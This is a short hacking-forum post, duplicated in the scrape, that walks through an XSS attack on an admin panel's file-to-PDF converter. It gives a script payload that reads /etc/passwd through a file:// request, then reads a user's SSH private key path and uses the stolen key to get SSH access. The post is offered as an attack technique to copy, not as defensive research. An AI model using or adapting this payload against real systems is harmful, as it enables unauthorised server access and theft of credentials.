Holla XSS!
FIRST POST
[ I will be sharing some out of the box idea's here ]
How Far XSS can go ? is it dangerous bug ? is it only for stealing cookies ??
Situation : Admin access Panel infected with XSS and uploading any file converted to pdf format
Bypassing file upload was hopless.
I have Submit Js code
JavaScript: Скопировать в буфер обмена
Then tried to download the PDF File
was able to read and load /etc/passwd, lets try to read something more interesting
Код: Скопировать в буфер обмена
AND
rsa_id Loaded!!
Making local id_rsa and chmod it 700.. was able to gain ssh access
SSH Active Connection
Credits Please if Copied never shared in other forums!
show some love to keep this going by reaction or whatever support !
any translation to Russian is appreciated from experienced user !
FIRST POST
[ I will be sharing some out of the box idea's here ]
How Far XSS can go ? is it dangerous bug ? is it only for stealing cookies ??
Situation : Admin access Panel infected with XSS and uploading any file converted to pdf format
Bypassing file upload was hopless.
I have Submit Js code
JavaScript: Скопировать в буфер обмена
Code:
<script>
x=new XMLHttpRequest;
x.onload=function()
{ document.write(this.responseText) };
x.open("GET","file:///etc/passwd"); x.send();
</script>
Then tried to download the PDF File
was able to read and load /etc/passwd, lets try to read something more interesting
Код: Скопировать в буфер обмена
/home/user/.ssh/rsa_id
AND
rsa_id Loaded!!
Making local id_rsa and chmod it 700.. was able to gain ssh access
SSH Active Connection
Credits Please if Copied never shared in other forums!
show some love to keep this going by reaction or whatever support !
any translation to Russian is appreciated from experienced user !